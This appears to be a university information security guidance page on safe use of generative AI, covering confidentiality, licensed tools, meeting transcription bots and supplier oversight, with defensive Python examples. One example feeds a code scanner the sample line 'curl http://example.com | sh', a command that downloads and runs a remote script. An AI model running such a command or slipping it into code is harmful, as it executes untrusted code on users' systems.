Use Generative AI services safely
Generative AI services are likely to proliferate over the coming years. Many university staff and students already use them, but does their use pose a cyber security threat to the university?
Gartner describes Generative AI as a capability that can “learn from existing artifacts to generate new, realistic artifacts (at scale) that reflect the characteristics of the training data but doesn’t repeat it. It can produce a variety of novel content, such as images, video, music, speech, text, software code and product designs”. ChatGPT, for example, is a generative AI service based on a large language model (LLM) developed by OpenAI; it uses deep learning techniques to generate a variety of content, including human-like text responses to a wide range of prompts.
At a glance
Wherever possible, use the University-licensed generative AI tools, ChatGPT Edu and Copilot for Microsoft 365
Ensure a third-party security assessment has been completed before using any other generative AI service, and take care when sharing personal data with these services
Be cautious about the use of AI bots in Teams meetings, and take precautions to reduce security risks
Risk to confidentiality
The main information security risk to the university in using generative AI cloud services is in relation to a loss of confidentiality. The university has an information classification scheme with three levels of confidentiality: Public, Internal and Confidential.
Information classified as Public does not carry a confidentiality risk. Information classified as Internal or Confidential carries risk. Before any processing of Internal or Confidential information using generative AI services, the following steps must be taken to mitigate risk.
1. As with all service providers holding or processing university information, information supplied to a generative AI tool in the form of questions or other artefacts is typically stored by the third-party service provider and is subject to threats from cyber criminals and other malicious actors, such as hostile nation states. All cloud-based generative AI tools should therefore be subject to a security risk assessment before being used. The Information Security GRC Team has a third-party security assessment (TPSA) tool to help complete an assessment. It is generally not possible to complete a full assessment for free and open-source services; in such cases, they should not be used for Confidential information.
2. Information provided to generative AI services may be accessible to the service provider, its partners and sub-contractors, and is likely to be used in some way, such as to train AI models; this is particularly likely when the service is free to use. Check service agreements for conditions on usage and ownership: if these are not explicitly set out in an agreement, the service carries an unknown risk to confidentiality. If any personal data is processed using generative AI and you do not opt out of the use of that data by the third party, this secondary processing must be considered in your data protection by design work. In particular, you must be transparent with those whose data may be fed into the generative AI model and alert them to any secondary processing that may occur.
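Where prompts may contain personal data, one practical precaution is to redact it before anything leaves the University. The short Python sketch below illustrates the idea; the patterns, placeholder labels and function name are illustrative assumptions, and pattern matching is a first line of defence rather than a complete or approved redaction mechanism.

```python
import re

# Illustrative patterns only: personal data takes many forms, and pattern
# matching will never catch all of them.
REDACTION_PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "UK_PHONE": re.compile(r"\b(?:\+44\s?|0)\d{4}\s?\d{6}\b"),
}

def redact(text: str) -> str:
    """Replace likely personal data with placeholder tokens before the
    text is sent to an external generative AI service."""
    for label, pattern in REDACTION_PATTERNS.items():
        text = pattern.sub(f"[{label} REDACTED]", text)
    return text

prompt = "Summarise this complaint from jane.doe@dept.ox.ac.uk (tel. 01865 123456)."
print(redact(prompt))
# Summarise this complaint from [EMAIL REDACTED] (tel. [UK_PHONE REDACTED]).
```

Redaction supplements, rather than replaces, the assessment and opt-out steps above: a service with unknown terms still carries an unknown risk.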
Data integrity
It is important to check generated output, particularly code or other sensitive output, as it may be false or misleading. One potential cyber risk is “poisoning” of AI training data to manipulate the behaviour of the model and cause it to produce malicious output. This is an emerging threat; we will continue to watch it and other evolving threats and update our advice accordingly.
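As a concrete illustration of checking generated code before it is trusted, the sketch below parses AI-generated Python without executing it and flags calls that deserve close scrutiny. The function name and the list of suspect calls are assumptions for illustration; a clean scan is a triage step, not a substitute for human code review.

```python
import ast

# Calls that warrant careful human review in generated code.
# Illustrative, not exhaustive.
SUSPECT_CALLS = {"eval", "exec", "compile", "system", "popen", "__import__"}

def triage_generated_code(source: str) -> list[str]:
    """Parse generated Python without executing it and flag suspect calls."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"does not parse: {exc}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", None)
            if name in SUSPECT_CALLS:
                findings.append(f"line {node.lineno}: call to {name}()")
    return findings

generated = 'import os\nos.system("curl http://example.com | sh")\n'
for finding in triage_generated_code(generated):
    print(finding)  # line 2: call to system()
```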
University-licensed generative AI tools
Two major generative AI tools, ChatGPT Edu and Copilot for Microsoft 365, are available for University departments and colleges to license via the University's AI and Machine Learning Competency Centre. The Information Security GRC Team has specific guidance on the confidentiality risks of using these tools under a Competency Centre licence, set out below. Our general guidance on the potential unreliability of generative AI outputs, and the consequent data integrity risk, continues to apply to tools licensed via the Competency Centre.
ChatGPT Edu
ChatGPT Edu licensed via the Competency Centre has been approved by the Information Security team for processing Confidential University data. University data processed by ChatGPT Edu under a Competency Centre licence will not be used to train the AI model. However, any processing of personal data using ChatGPT Edu should still be discussed with the Information Compliance team, to ensure that the processing complies with general data protection principles.
Copilot for Microsoft 365
Copilot for Microsoft 365 has read access to all information accessible to a licensed user via their University Microsoft 365 account. Access permissions are often poorly managed, and this can go unnoticed; Copilot's ability to comb through large volumes of information increases the risk that over-permissive access will expose Confidential University data. Departments and colleges purchasing a Copilot for Microsoft 365 licence should therefore review access permissions and issue advice on permissions management before implementing Copilot. As with any other tool, users should ensure that any processing of personal data with Copilot complies with general data protection principles.
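As an illustration of what such a review might look like in practice, the following sketch uses the Microsoft Graph API to list the sharing permissions on items in a user's OneDrive root, so that over-broad sharing can be spotted before Copilot is enabled. It assumes a delegated access token with the Files.Read.All Graph permission; token acquisition, paging through large result sets and coverage of SharePoint or Teams content are omitted for brevity.

```python
import requests

GRAPH = "https://graph.microsoft.com/v1.0"
# Placeholder token: obtain one via your usual OAuth2 flow with the
# Files.Read.All delegated permission.
HEADERS = {"Authorization": "Bearer <access-token>"}

def flag_shared_items() -> None:
    """List sharing permissions on items in the user's OneDrive root so
    over-broad sharing links can be reviewed before a Copilot rollout."""
    items = requests.get(f"{GRAPH}/me/drive/root/children",
                         headers=HEADERS).json()
    for item in items.get("value", []):
        perms = requests.get(
            f"{GRAPH}/me/drive/items/{item['id']}/permissions",
            headers=HEADERS,
        ).json()
        for perm in perms.get("value", []):
            link = perm.get("link") or {}
            # A link scope of "anonymous" or "organization" signals broad sharing
            print(item["name"], perm.get("roles"), link.get("scope"))

flag_shared_items()
```

A real permissions review would also need to cover shared mailboxes, Teams and SharePoint sites, so treat this as a starting point only.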
AI transcription bots in meetings
The use of AI-based transcription bots as participants in Teams meetings is becoming more widespread. Anyone using such services should consider the following.
- There should be no use of unapproved AI transcription bots in Teams meetings by any participants.
- It is permissible to record meetings using the inbuilt Teams Transcription facility or Microsoft's Copilot subject to appropriate data protection considerations.
- Use of any AI transcription bot service other than the inbuilt Teams Transcription or Microsoft’s Copilot is subject to the same third-party security assessment requirements as any other third-party service used to process University data.
- Meeting organisers should set meeting options so as to prevent internal or external participants from adding unapproved transcription bots; for further guidance on these options, please see this article. (A configuration sketch follows this list.)
- For Teams meetings organised by external parties, University members should either request that any AI transcription bot added by the external party is removed, or else avoid discussing any non-Public University information in the meeting.
- Use of AI transcription bots, including use of the inbuilt Teams Transcription or Microsoft’s Copilot under a University licence, may raise additional non-security related data protection concerns that need to be discussed with the Information Compliance team.
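Most organisers will set these options through the Teams meeting options page, as described in the guidance linked above. For meetings managed programmatically, the sketch below shows the same idea applied via the Microsoft Graph API: everyone except the organiser waits in the lobby, so an unapproved bot cannot join unnoticed. The token and meeting id are placeholders, and the exact property names and values should be checked against current Microsoft documentation.

```python
import requests

GRAPH = "https://graph.microsoft.com/v1.0"
# Placeholder token: requires the OnlineMeetings.ReadWrite delegated
# permission and applies only to meetings you organise.
HEADERS = {"Authorization": "Bearer <access-token>"}
MEETING_ID = "<online-meeting-id>"

# Send everyone except the organiser to the lobby, so the organiser can
# admit known human participants and turn away unapproved bots.
settings = {
    "lobbyBypassSettings": {"scope": "organizer"},
    "allowedPresenters": "organizer",
}
resp = requests.patch(f"{GRAPH}/me/onlineMeetings/{MEETING_ID}",
                      headers=HEADERS, json=settings)
resp.raise_for_status()
```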
Use of generative AI to launch cyber attacks
Aside from the use of generative AI to process University data, there is much discussion of the use of generative AI services by criminal groups and other cyber attackers, for example to develop malware, write convincing phishing emails or create deepfake videos. Awareness is key to preventing this type of attack, as is adherence to the University's information security policy and its underpinning baseline security standard, to ensure a good level of security.
Working with third parties
Before you entrust the University's data or information to any partner or supplier, you need to be sure they can and will keep it safe from attack.
To ensure that third-party partners and suppliers meet the standards of information security required by the University and your division, department or faculty, you must:
- Maintain an up-to-date record of all third parties that access, store or process University information on behalf of your division, department or faculty (a minimal register sketch follows this list)
- Ensure that, for all new agreements with third parties, due diligence is exercised around information security and that contractual arrangements are adequate
- Ensure that information security arrangements contained in existing agreements are reviewed and are adequate
- Monitor the compliance of third parties against your information security requirements and contractual arrangements
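The form such a record takes will vary between departments, but even a simple structured register makes review and monitoring far easier. The sketch below is a minimal illustration in Python; the field names and example values are assumptions to adapt, not a prescribed format.

```python
import csv
from dataclasses import dataclass, asdict, fields

# Field names are illustrative; adapt them to your department's needs.
@dataclass
class ThirdPartyRecord:
    supplier: str
    service: str
    data_classification: str   # Public / Internal / Confidential
    tpsa_completed: str        # date of last third-party security assessment
    contract_review_due: str   # date of next contractual review

register = [
    ThirdPartyRecord("ExampleCloud Ltd", "Transcription API",
                     "Internal", "2024-05-01", "2025-05-01"),
]

with open("third_party_register.csv", "w", newline="") as f:
    writer = csv.DictWriter(
        f, fieldnames=[fld.name for fld in fields(ThirdPartyRecord)])
    writer.writeheader()
    writer.writerows(asdict(rec) for rec in register)
```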
Contact us
Please contact the Information Security GRC Team grc@infosec.ox.ac.uk for support on information security issues.
If you intend to provide personal data when using generative AI, seek advice from your local information governance lead or the Information Compliance team information.compliance@admin.ox.ac.uk.